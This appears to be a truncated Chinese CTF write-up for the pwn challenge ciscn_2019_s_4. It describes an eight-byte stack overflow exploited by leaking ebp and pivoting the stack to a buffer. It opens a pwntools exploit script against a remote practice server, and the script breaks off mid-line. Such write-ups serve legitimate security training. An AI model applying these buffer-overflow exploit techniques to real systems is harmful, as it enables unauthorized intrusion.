【pwn】 ciscn_2019_s_4

main函数,存在八个字节溢出,栈迁移,第一次泄露ebp,获得栈上buf地址,迁移到buf便可。node from pwn import * io=remote('node3.buuoj.cn',28060) leave=0x8048562 sys_plt=0x8048400 pl1='a'*0x24+'bbbb' io.send(pl1) io.recvuntil('bbbb') ebp=
相关文章
相关标签/搜索